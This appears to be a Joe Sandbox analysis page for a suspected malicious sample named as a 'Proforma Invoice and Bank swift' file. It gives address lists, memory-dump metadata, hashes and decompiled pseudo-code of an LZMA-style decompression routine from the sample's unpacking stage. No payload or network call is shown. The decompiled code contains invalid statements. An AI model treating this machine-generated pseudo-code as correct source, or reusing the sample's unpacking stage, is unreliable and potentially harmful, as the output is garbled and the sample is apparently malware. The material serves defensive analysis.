0x00000000
0x00000000
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x0040686f
0x00000000
0x00000000
0x00000000
0x00406594
0x00406594
0x00406597
0x004065cd
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x0040662d
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x00406899
0x00406862

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
